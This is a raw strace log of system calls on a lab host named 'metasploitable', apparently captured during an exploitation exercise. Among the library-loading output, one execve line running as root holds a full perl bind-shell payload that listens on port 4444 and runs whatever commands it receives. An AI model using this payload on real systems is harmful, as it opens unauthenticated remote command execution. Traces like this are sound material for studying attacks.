7723  07:20:06.725883 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d50000

7723  07:20:06.725898 mmap2(0xb7d64000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d64000

7723  07:20:06.725918 mmap2(0xb7d66000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d66000

7723  07:20:06.725937 close(1)          = 0

7723  07:20:06.725993 munmap(0xb7ef6000, 29913) = 0

7723  07:20:06.726018 open("/etc/ld.so.cache", O_RDONLY) = 1

7723  07:20:06.726060 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7723  07:20:06.726083 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef6000

7723  07:20:06.726096 close(1)          = 0

7723  07:20:06.726123 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.726142 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7723  07:20:06.726159 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7723  07:20:06.726303 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7723  07:20:06.726340 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d46000

7723  07:20:06.726355 mmap2(0xb7d4e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d4e000

7723  07:20:06.726376 close(1)          = 0

7723  07:20:06.726392 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.726408 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7723  07:20:06.726432 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7723  07:20:06.726642 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7723  07:20:06.726668 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d3b000

7723  07:20:06.726685 mmap2(0xb7d44000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d44000

7723  07:20:06.726708 close(1)          = 0

7723  07:20:06.726792 munmap(0xb7ef6000, 29913) = 0

7723  07:20:06.726829 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7723  07:20:06.726850 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7723  07:20:06.726868 _llseek(1, 0, [0], SEEK_CUR) = 0

7723  07:20:06.726886 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7723  07:20:06.726910 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7efd000

7723  07:20:06.726926 _llseek(1, 1624, [1624], SEEK_SET) = 0

7723  07:20:06.726962 munmap(0xb7efd000, 1624) = 0

7723  07:20:06.726976 close(1)          = 0

7723  07:20:06.727019 getpgrp()         = 3831

7723  07:20:06.727081 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7723  07:20:06.727106 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7723  07:20:06.727144 brk(0x8101000)    = 0x8101000

7723  07:20:06.727190 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.727211 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.727232 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.727288 brk(0x8102000)    = 0x8102000

7723  07:20:06.727324 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7723  07:20:06.727351 stat64("/sbin/AB", 0xbf9e4038) = -1 ENOENT (No such file or directory)

7723  07:20:06.727369 stat64("/bin/AB", 0xbf9e4038) = -1 ENOENT (No such file or directory)

7723  07:20:06.727385 stat64("/usr/sbin/AB", 0xbf9e4038) = -1 ENOENT (No such file or directory)

7723  07:20:06.727402 stat64("/usr/bin/AB", 0xbf9e4038) = -1 ENOENT (No such file or directory)

7723  07:20:06.727420 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7723  07:20:06.727442 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d716f8) = 7724

7724  07:20:06.727517 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7724  07:20:06.727578 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7724  07:20:06.727612 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7724  07:20:06.727628 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7724  07:20:06.727653 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7724  07:20:06.727690 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7724  07:20:06.727708 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7724  07:20:06.727785 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7724  07:20:06.727807 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7724  07:20:06.727953 exit_group(127)   = ?

4519  07:20:06.741679 waitpid(7723,  <unfinished ...>

7723  07:20:06.751027 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7723  07:20:06.751028 --- SIGCHLD (Child exited) @ 0 (0) ---

7723  07:20:06.751028 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7724

7723  07:20:06.751028 waitpid(-1, 0xbf9e3cb8, WNOHANG) = -1 ECHILD (No child processes)

7723  07:20:06.751028 sigreturn()       = ? (mask now [])

7723  07:20:06.751028 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7723  07:20:06.751047 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7723  07:20:06.751061 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7723  07:20:06.751076 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7723  07:20:06.751099 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7723  07:20:06.751112 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7723  07:20:06.751157 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7723  07:20:06.751183 stat64("/sbin/perl", 0xbf9e4068) = -1 ENOENT (No such file or directory)

7723  07:20:06.751199 stat64("/bin/perl", 0xbf9e4068) = -1 ENOENT (No such file or directory)

7723  07:20:06.751213 stat64("/usr/sbin/perl", 0xbf9e4068) = -1 ENOENT (No such file or directory)

7723  07:20:06.751228 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7723  07:20:06.751251 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7723  07:20:06.751281 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7723  07:20:06.751310 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d716f8) = 7725

7725  07:20:06.761691 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7725  07:20:06.761725 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7725  07:20:06.761739 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7725  07:20:06.761751 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7725  07:20:06.761767 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7725  07:20:06.761784 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7725  07:20:06.761797 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7725  07:20:06.761835 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7725  07:20:06.761933 brk(0)            = 0x8153000

7725  07:20:06.761955 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.761972 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5b000

7725  07:20:06.761989 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762006 open("/etc/ld.so.cache", O_RDONLY) = 1

7725  07:20:06.762019 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7725  07:20:06.762037 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f53000

7725  07:20:06.762048 close(1)          = 0

7725  07:20:06.762059 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762074 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7725  07:20:06.762089 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7725  07:20:06.762199 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7725  07:20:06.762218 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4f000

7725  07:20:06.762231 mmap2(0xb7f51000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f51000

7725  07:20:06.762247 close(1)          = 0

7725  07:20:06.762259 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762273 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7725  07:20:06.762287 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7725  07:20:06.762376 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7725  07:20:06.762393 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2a000

7725  07:20:06.762404 mmap2(0xb7f4d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f4d000

7725  07:20:06.762420 close(1)          = 0

7725  07:20:06.762432 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762446 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7725  07:20:06.762460 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7725  07:20:06.762547 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7725  07:20:06.762564 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f29000

7725  07:20:06.762577 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f11000

7725  07:20:06.762588 mmap2(0xb7f25000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f25000

7725  07:20:06.762602 mmap2(0xb7f27000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f27000

7725  07:20:06.762620 close(1)          = 0

7725  07:20:06.762640 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762655 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7725  07:20:06.762670 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7725  07:20:06.762759 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7725  07:20:06.762777 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc2000

7725  07:20:06.762788 mmap2(0xb7f0b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f0b000

7725  07:20:06.762803 mmap2(0xb7f0e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f0e000

7725  07:20:06.762817 close(1)          = 0

7725  07:20:06.762829 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7725  07:20:06.762843 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7725  07:20:06.762857 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7725  07:20:06.762947 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7725  07:20:06.762964 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d90000

7725  07:20:06.762975 mmap2(0xb7d99000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d99000

7725  07:20:06.762989 mmap2(0xb7d9b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d9b000

7725  07:20:06.763003 close(1)          = 0

7725  07:20:06.763026 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d8f000

7725  07:20:06.763039 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d8f8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7725  07:20:06.763100 mprotect(0xb7f0b000, 4096, PROT_READ) = 0

7725  07:20:06.763126 munmap(0xb7f53000, 29913) = 0

7725  07:20:06.763225 set_tid_address(0xb7d8f908) = 7725

7725  07:20:06.763235 set_robust_list(0xb7d8f910, 0xc) = 0

7725  07:20:06.763245 futex(0xbfdc4260, 0x81 /* FUTEX_??? */, 1) = 0

7725  07:20:06.763259 rt_sigaction(SIGRTMIN, {0xb7f152c0, [], SA_SIGINFO}, NULL, 8) = 0

7725  07:20:06.763273 rt_sigaction(SIGRT_1, {0xb7f15340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7725  07:20:06.763285 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7725  07:20:06.763299 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7725  07:20:06.763318 uname({sys="Linux", node="metasploitable", ...}) = 0

7725  07:20:06.763366 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7725  07:20:06.763412 brk(0)            = 0x8153000

7725  07:20:06.763422 brk(0x8174000)    = 0x8174000

7725  07:20:06.763466 getuid32()        = 0

7725  07:20:06.763476 geteuid32()       = 0

7725  07:20:06.763486 getgid32()        = 0

7725  07:20:06.763494 getegid32()       = 0

7725  07:20:06.763534 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d6e000

7725  07:20:06.763563 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7725  07:20:06.763580 read(1, "\220jw/", 4) = 4

7725  07:20:06.763593 close(1)          = 0

7725  07:20:06.763612 time(NULL)        = 1495624806

7725  07:20:06.763653 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfdc3f30) = -1 ENOENT (No such file or directory)

7725  07:20:06.763670 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfdc3f30) = -1 ENOENT (No such file or directory)

